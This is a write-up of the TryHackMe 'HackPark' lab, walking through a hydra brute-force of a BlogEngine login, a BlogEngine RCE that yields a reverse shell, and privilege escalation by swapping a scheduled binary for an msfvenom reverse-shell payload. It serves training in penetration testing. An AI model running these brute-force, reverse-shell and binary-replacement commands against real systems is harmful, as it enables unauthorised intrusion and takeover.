Posts HackPark Writeup [THM]
Post
Cancel

HackPark Writeup [THM]

Hackpark is a Windows machine from tryhackme , it consists on bruteforcing a login form, using RCE to its CMS and by using WinPEAS identify a binary which could be replaced by a shell to obtain administrator privileges

Enumeration

Running nmap :

1
2
3
4
5
6
7
8
9
10
11
12
13
  nmap -sC -sV -o nmap.txt -Pn 10.10.45.21
  PORT     STATE SERVICE            VERSION
  80/tcp   open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  | http-methods:
  |_  Potentially risky methods: TRACE
  | http-robots.txt: 6 disallowed entries
  | /Account/*.* /search /search.aspx /error404.aspx
  |_/archive /archive.aspx
  |_http-server-header: Microsoft-IIS/8.5
  |_http-title: hackpark | hackpark amusements
  3389/tcp open  ssl/ms-wbt-server?
  |_ssl-date: 2020-07-29T16:16:07+00:00; +1s from scanner time.
  Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

We see that port 80 is open, checking it we see a picture of pennywise:

Web

Going through the menu , a login page is found running blogengine.net

Login

In order to login we are going to bruteforce with hydra, using admin as user

1
2
3
 hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.79.241  http-post-form "/Account/login.aspx:__VIEWSTATE=ScTUsDEL61RxXQbUkxPIvjWwWIPtRoGua7VlvlhkXMv83IlH8nDZNBJap5qDDRHYpohgQkDHiy%2FBC%2BxgOpa%2BQyclcuurGR6oEQrtrgMMab51BRVITHbw51etTYHg%2BOSqlTEdhO1sq6LyFJ6OiiTP6d9DJf02wqbnAd2tPNuj2XvUivov&__EVENTVALIDATION=IwDYcG9QBNf8p2xPKx%2B%2Fw5JxMDpBvm8H7wN1ksA5dw9A8UBpnwOCo0Dw%2BPk5zNJmkB9lQ%2FliisMfMuMuK0XXTqgvEqLeivDFKIVc5TL58r9bwhfN6No%2FVNcCXAAYsaZZOdkMyqjZVNaOltsfMh1u4e0p9aFSTmWecZYwxusByDyG%2FSae&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login Failed" -t 64
 [80][http-post-form] host: 10.10.79.241   login: admin   password: ******
 1 of 1 target successfully completed, 1 valid password found

With the credentials obtained (according to writeup rules the password can´t be shown) we access to the CMS and see that the machine is running Blogengine version 3.3.6 Blog

Exploitation

Doing a quick search for exploits, I found the following RCE vulnerability : https://www.exploit-db.com/exploits/46353

In order to obtain a reverse shell, we need to copy that code to a file name PostView.ascx, then browsing to http://IP/admin/app/editor/editpost.cshtml to upload the file

Shell

To trigger the reverse shell we need to browse to http://IP/?theme=../../App_Data/files

Checking netcat , we obtain a reverse connection

1
2
3
4
5
6
7
nc -lvnp 443
listening on [any] 443 ...
connect to [10.11.14.106] from (UNKNOWN) [10.10.79.241] 49326
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved
c:\windows\system32\inetsrv>whoami
iis apppool\blog

We see that we have obtained a shell as iis apppool

Privilege Escalation

For this part we are going to use an enumeration tool called WinPEAS : https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

To share it we will create an smbserver in our machine

1
smbserver.py smbfolder .

From the remote machine we will use copy to obtain the binary

1
2
c:\tmp>copy \\10.11.14.106\smbfolder\winPEAS.exe
        1 file(s) copied.

After reading all colored output of winPEAS , I found this uncommon binary

1
2
WindowsScheduler(Splinterware Software Solutions - System Scheduler Service)[C:\PROGRA~2\SYSTEM~1\WService.exe] - Auto - Running                                                                     
Possible DLL Hijacking in binary folder: C:\Program Files (x86)\SystemScheduler (Everyone [WriteData/CreateFiles])

Going to that directory , we found the following log file :

1
2
3
4
5
08/07/20 04:06:34,Process Ended. PID:480,ExitCode:4,Message.exe (Administrator)
08/07/20 04:07:02,Event Started Ok, (Administrator)
08/07/20 04:07:33,Process Ended. PID:2420,ExitCode:4,Message.exe (Administrator)
08/07/20 04:08:02,Event Started Ok, (Administrator)
08/07/20 04:08:33,Process Ended. PID:800,ExitCode:4,Message.exe (Administrator)

Therefore, with this information and knowing that we can overwrite files, we can change Message.exe by a shell we generate with msfvenom

1
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.14.106 LPORT=8888 -f exe -o Message.exe

We first rename Message.exe and then upload our reverse shell

1
2
3
C:\Program Files (x86)\SystemScheduler>ren Message.exe Message.exe.bak
C:\Program Files (x86)\SystemScheduler>copy \\10.11.14.106\smbfolder\Message.exe
        1 file(s) copied.

Finally, after a few seconds we obtain a reverse connection as Administrator

1
2
3
4
5
6
7
nc -lvnp 8888
listening on [any] 8888 ...                                                                                                
connect to [10.11.14.106] from (UNKNOWN) [10.10.79.241] 49517                                                              
Microsoft Windows [Version 6.3.9600]                                                                                       
(c) 2013 Microsoft Corporation. All rights reserved.
C:\>whoami
hackpark\administrator
This post is licensed under CC BY 4.0 by the author.